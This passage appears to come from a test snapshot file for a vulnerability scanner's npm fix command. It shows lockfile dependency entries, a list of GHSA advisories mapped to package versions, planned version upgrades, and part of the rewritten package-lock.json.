"https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", 
"aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": 
"https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": 
"sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": 
"sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": 
"1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand/fix_non-interactive_json_in-place_package-lock.json - 1] { "path": "/package-lock.json", "ecosystem": "npm", "strategy": "in-place", "vulnerabilities": [ { "id": "GHSA-23c5-xmqv-rm74", "packages": [ { "name": "minimatch", "version": "3.1.2" } ] }, { "id": "GHSA-2g4f-4pwh-qvx6", "packages": [ { "name": "ajv", "version": "6.12.6" } ] }, { "id": "GHSA-43f8-2h32-f4cj", "packages": [ { "name": "hosted-git-info", "version": "2.1.4" } ] }, { "id": "GHSA-43f8-2h32-f4cj", "packages": [ { "name": "hosted-git-info", "version": "1.6.0" } ], "unactionable": true }, { "id": "GHSA-6rw7-vpxm-498p", "packages": [ { "name": "qs", "version": "6.5.3" } ], "unactionable": true }, { "id": "GHSA-72xf-g2v4-qvf3", "packages": [ { "name": "tough-cookie", "version": "2.5.0" } ], "unactionable": true }, { "id": "GHSA-c2qf-rxjj-qqgw", "packages": [ { "name": "semver", "version": "4.3.6" } ], "unactionable": true }, { "id": "GHSA-c6rq-rjc2-86v2", "packages": [ { "name": "chownr", "version": "0.0.2" } ], "unactionable": true }, { "id": "GHSA-fjxv-7rqg-78g4", "packages": [ { "name": "form-data", "version": "2.3.3" } ], "unactionable": true }, { "id": "GHSA-g74r-ffvr-5q9f", "packages": [ { "name": "concat-stream", "version": "1.5.0" } ] }, { "id": "GHSA-p8p7-x288-28g6", 
"packages": [ { "name": "request", "version": "2.88.2" } ], "unactionable": true }, { "id": "GHSA-v6h2-p8h4-qcjw", "packages": [ { "name": "brace-expansion", "version": "1.1.11" } ] } ], "patches": [ { "packageUpdates": [ { "name": "minimatch", "versionFrom": "3.1.2", "versionTo": "3.1.5", "transitive": true } ], "fixed": [ { "id": "GHSA-23c5-xmqv-rm74", "packages": [ { "name": "minimatch", "version": "3.1.2" } ] }, { "id": "GHSA-3ppc-4f35-3m26", "packages": [ { "name": "minimatch", "version": "3.1.2" } ] }, { "id": "GHSA-7r86-cg39-jmmj", "packages": [ { "name": "minimatch", "version": "3.1.2" } ] } ] }, { "packageUpdates": [ { "name": "ajv", "versionFrom": "6.12.6", "versionTo": "6.14.0", "transitive": true } ], "fixed": [ { "id": "GHSA-2g4f-4pwh-qvx6", "packages": [ { "name": "ajv", "version": "6.12.6" } ] } ] }, { "packageUpdates": [ { "name": "brace-expansion", "versionFrom": "1.1.11", "versionTo": "1.1.12", "transitive": true } ], "fixed": [ { "id": "GHSA-v6h2-p8h4-qcjw", "packages": [ { "name": "brace-expansion", "version": "1.1.11" } ] } ] }, { "packageUpdates": [ { "name": "concat-stream", "versionFrom": "1.5.0", "versionTo": "1.6.1", "transitive": true } ], "fixed": [ { "id": "GHSA-g74r-ffvr-5q9f", "packages": [ { "name": "concat-stream", "version": "1.5.0" } ] } ] }, { "packageUpdates": [ { "name": "hosted-git-info", "versionFrom": "2.1.4", "versionTo": "2.8.9", "transitive": true } ], "fixed": [ { "id": "GHSA-43f8-2h32-f4cj", "packages": [ { "name": "hosted-git-info", "version": "2.1.4" } ] } ] } ] } --- [TestCommand/fix_non-interactive_json_in-place_package-lock.json - 2] Scanning /package-lock.json... Rewriting /package-lock.json... 
--- [TestCommand/fix_non-interactive_json_in-place_package-lock.json - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, "node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", 
"integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "dependencies": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { 
"version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.6.1", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, 
"node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": 
"https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": 
